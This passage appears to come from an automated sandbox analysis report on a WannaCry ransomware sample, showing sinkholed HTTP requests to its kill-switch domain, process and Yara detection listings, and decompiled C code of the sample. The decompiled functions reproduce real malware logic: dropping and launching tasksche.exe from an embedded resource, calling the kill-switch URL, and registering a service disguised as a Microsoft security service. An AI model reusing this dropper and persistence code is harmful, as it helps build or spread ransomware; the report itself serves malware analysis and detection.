              Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
              Cache-Control: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1104.16.173.8080192.168.2.549698C:\Users\user\Desktop\e0R5qxY8Vj.exe
              TimestampkBytes transferredDirectionData
              Oct 10, 2022 17:16:05.010910988 CEST91INHTTP/1.1 200 OK
              Date: Mon, 10 Oct 2022 15:16:04 GMT
              Content-Type: text/html
              Content-Length: 607
              Connection: close
              Server: cloudflare
              CF-RAY: 758050aafabebb74-FRA
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
              Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.549699104.17.244.8180C:\Users\user\Desktop\e0R5qxY8Vj.exe
              TimestampkBytes transferredDirectionData
              Oct 10, 2022 17:16:06.148979902 CEST92OUTGET / HTTP/1.1
              Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
              Cache-Control: no-cache
              Oct 10, 2022 17:16:06.200510979 CEST93INHTTP/1.1 200 OK
              Date: Mon, 10 Oct 2022 15:16:06 GMT
              Content-Type: text/html
              Content-Length: 607
              Connection: close
              Server: cloudflare
              CF-RAY: 758050b27d798fef-FRA
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
              Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:17:16:03
              Start date:10/10/2022
              Path:C:\Users\user\Desktop\e0R5qxY8Vj.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\e0R5qxY8Vj.exe
              Imagebase:0x400000
              File size:3723264 bytes
              MD5 hash:B6AEAB8B14C4279100D7F14B78DC4EC5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000000.304901922.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000000.00000002.316455024.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000000.305025447.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000000.00000002.316571024.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
              Reputation:low

              General

              Target ID:1
              Start time:17:16:04
              Start date:10/10/2022
              Path:C:\Users\user\Desktop\e0R5qxY8Vj.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\e0R5qxY8Vj.exe -m security
              Imagebase:0x400000
              File size:3723264 bytes
              MD5 hash:B6AEAB8B14C4279100D7F14B78DC4EC5
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.575670502.000000000042E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.577450819.0000000002528000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.577450819.0000000002528000.00000004.00000800.00020000.00000000.sdmp, Author: us-cert code analysis team
              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.575721583.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000000.308511699.0000000000710000.00000002.00000001.01000000.00000003.sdmp, Author: us-cert code analysis team
              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000002.576523594.0000000001FF6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000001.00000002.576523594.0000000001FF6000.00000004.00000800.00020000.00000000.sdmp, Author: us-cert code analysis team
              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000001.00000000.308319375.000000000040F000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
              Reputation:low

              General

              Target ID:2
              Start time:17:16:06
              Start date:10/10/2022
              Path:C:\Windows\tasksche.exe
              Wow64 process (32bit):false
              Commandline:C:\WINDOWS\tasksche.exe /i
              Imagebase:0x400000
              File size:3514368 bytes
              MD5 hash:753B5844028FBC529C56ADCE1F2FF2C1
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000000.311420520.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 93%, ReversingLabs
              Reputation:low

              Disassembly

              Reset < >

                Executed Functions

                Function 00407CE0 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 175libraryloaderfileCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E00407CE0() {
				void _v259;
				char _v260;
				void _v519;
				char _v520;
				struct _STARTUPINFOA _v588;
				struct _PROCESS_INFORMATION _v604;
				long _v608;
				_Unknown_base(*)()* _t36;
				void* _t38;
				void* _t39;
				void* _t50;
				int _t59;
				struct HINSTANCE__* _t104;
				struct HRSRC__* _t105;
				void* _t107;
				void* _t108;
				long _t109;
				intOrPtr _t121;
				intOrPtr _t122;

				_t104 = GetModuleHandleW(L"kernel32.dll");
				if(_t104 != 0) {
					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
					 *0x431460 = GetProcAddress(_t104, "WriteFile");
					_t36 = GetProcAddress(_t104, "CloseHandle");
					 *0x43144c = _t36;
					if( *0x431478 != 0) {
						_t121 =  *0x431458; // 0x766df7b0
						if(_t121 != 0) {
							_t122 =  *0x431460; // 0x766dfc30
							if(_t122 != 0 && _t36 != 0) {
								_t105 = FindResourceA(0, 0x727, "R");
								if(_t105 != 0) {
									_t38 = LoadResource(0, _t105);
									if(_t38 != 0) {
										_t39 = LockResource(_t38);
										_v608 = _t39;
										if(_t39 != 0) {
											_t109 = SizeofResource(0, _t105);
											if(_t109 != 0) {
												_v520 = 0;
												memset( &_v519, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												_v260 = 0;
												memset( &_v259, 0, 0x40 << 2);
												asm("stosw");
												asm("stosb");
												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
												MoveFileExA( &_v520,  &_v260, 1); // executed
												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
												_t107 = _t50;
												if(_t107 != 0xffffffff) {
													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
													FindCloseChangeNotification(_t107); // executed
													_v604.hThread = 0;
													_v604.dwProcessId = 0;
													_v604.dwThreadId = 0;
													memset( &(_v588.lpReserved), 0, 0x10 << 2);
													asm("repne scasb");
													_v604.hProcess = 0;
													_t108 = " /i";
													asm("repne scasb");
													memcpy( &_v520 - 1, _t108, 0 << 2);
													memcpy(_t108 + 0x175b75a, _t108, 0);
													_v588.cb = 0x44;
													_v588.wShowWindow = 0;
													_v588.dwFlags = 0x81;
													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
													if(_t59 != 0) {
														CloseHandle(_v604.hThread);
														CloseHandle(_v604);
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return 0;
			}






















                0x00407cf5
                0x00407cfb
                0x00407d15
                0x00407d22
                0x00407d2f
                0x00407d34
                0x00407d3c
                0x00407d43
                0x00407d49
                0x00407d4f
                0x00407d55
                0x00407d5b
                0x00407d7a
                0x00407d7e
                0x00407d86
                0x00407d8e
                0x00407d95
                0x00407d9d
                0x00407da1
                0x00407daf
                0x00407db3
                0x00407dc4
                0x00407dc8
                0x00407dca
                0x00407dcc
                0x00407ddb
                0x00407de2
                0x00407def
                0x00407df1
                0x00407e01
                0x00407e18
                0x00407e2c
                0x00407e43
                0x00407e49
                0x00407e4e
                0x00407e61
                0x00407e68
                0x00407e72
                0x00407e7a
                0x00407e82
                0x00407e8b
                0x00407e95
                0x00407e9b
                0x00407e9f
                0x00407ea8
                0x00407eb0
                0x00407ebc
                0x00407ed3
                0x00407edb
                0x00407ee0
                0x00407ee8
                0x00407ef0
                0x00407ef7
                0x00407f02
                0x00407f02
                0x00407ef0
                0x00407e4e
                0x00407db3
                0x00407da1
                0x00407d8e
                0x00407d7e
                0x00407d5b
                0x00407d4f
                0x00407d43
                0x00407f14

                APIs
                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6F59FB10,?,00000000), ref: 00407CEF
                • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                • sprintf.MSVCRT ref: 00407E01
                • sprintf.MSVCRT ref: 00407E18
                • MoveFileExA.KERNEL32 ref: 00407E2C
                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
                • CreateProcessA.KERNELBASE ref: 00407EE8
                • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                • CloseHandle.KERNEL32(08000000), ref: 00407F02
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.316305471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.316298685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316335558.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316434150.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316455024.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316496746.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316571024.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316707660.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                Yara matches
                Similarity
                • API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
                • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                • API String ID: 1541710770-1507730452
                • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40); // executed
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}
























                0x00409a19
                0x00409a1b
                0x00409a20
                0x00409a2b
                0x00409a2c
                0x00409a39
                0x00409a3e
                0x00409a43
                0x00409a4a
                0x00409a51
                0x00409a64
                0x00409a72
                0x00409a7b
                0x00409a80
                0x00409a85
                0x00409a8b
                0x00409a92
                0x00409a98
                0x00409a99
                0x00409a9e
                0x00409aa3
                0x00409aa8
                0x00409ab2
                0x00409acb
                0x00409ad1
                0x00409ad6
                0x00409adb
                0x00409ae8
                0x00409aea
                0x00409af0
                0x00409b2c
                0x00409b31
                0x00409b32
                0x00409b32
                0x00409af2
                0x00409af2
                0x00409af2
                0x00409af3
                0x00409af6
                0x00409af8
                0x00409b03
                0x00409b05
                0x00409b05
                0x00409b06
                0x00409b06
                0x00409b03
                0x00409b09
                0x00409b0d
                0x00000000
                0x00000000
                0x00409b13
                0x00409b1a
                0x00409b24
                0x00409b39
                0x00409b26
                0x00409b26
                0x00409b26
                0x00409b3a
                0x00409b3b
                0x00409b3c
                0x00409b44
                0x00409b45
                0x00409b4a
                0x00409b4e
                0x00409b54
                0x00409b59
                0x00409b5b
                0x00409b5e
                0x00409b5f
                0x00409b60
                0x00409b67

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.316305471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.316298685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316335558.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316434150.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316455024.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316496746.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316571024.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316707660.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                Yara matches
                Similarity
                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                • String ID:
                • API String ID: 801014965-0
                • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46networkCOMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				InternetCloseHandle(_t27); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}















                0x00408155
                0x00408157
                0x00408158
                0x0040815c
                0x00408160
                0x00408164
                0x00408168
                0x0040816c
                0x00408177
                0x0040817b
                0x0040818e
                0x00408194
                0x004081a7
                0x004081ab
                0x004081ad
                0x004081b9

                APIs
                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                • InternetCloseHandle.WININET(00000000), ref: 004081A7
                • InternetCloseHandle.WININET(00000000), ref: 004081AB
                  • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                  • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                Strings
                • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                Memory Dump Source
                • Source File: 00000000.00000002.316305471.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.316298685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316335558.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316434150.000000000040B000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316455024.000000000040F000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316496746.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316571024.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.316707660.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                Yara matches
                Similarity
                • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                • API String ID: 774561529-2942426231
                • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00407C40 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 54serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00407C40() {
				char _v260;
				void* _t15;
				void* _t17;

				sprintf( &_v260, "%s -m security", 0x70f760);
				_t15 = OpenSCManagerA(0, 0, 0xf003f);
				if(_t15 == 0) {
					return 0;
				} else {
					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
					if(_t17 != 0) {
						StartServiceA(_t17, 0, 0);
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t15);
					return 0;
				}
			}






                0x00407c56
                0x00407c6e
                0x00407c72
                0x00407cd3
                0x00407c74
                0x00407ca7
                0x00407cab
                0x00407cb2
                0x00407cb9
                0x00407cb9
                0x00407cbc
                0x00407cc9
                0x00407cc9

                APIs
                • sprintf.MSVCRT ref: 00407C56
                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F59FB10,00000000), ref: 00407C9B
                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                Strings
                Memory Dump Source
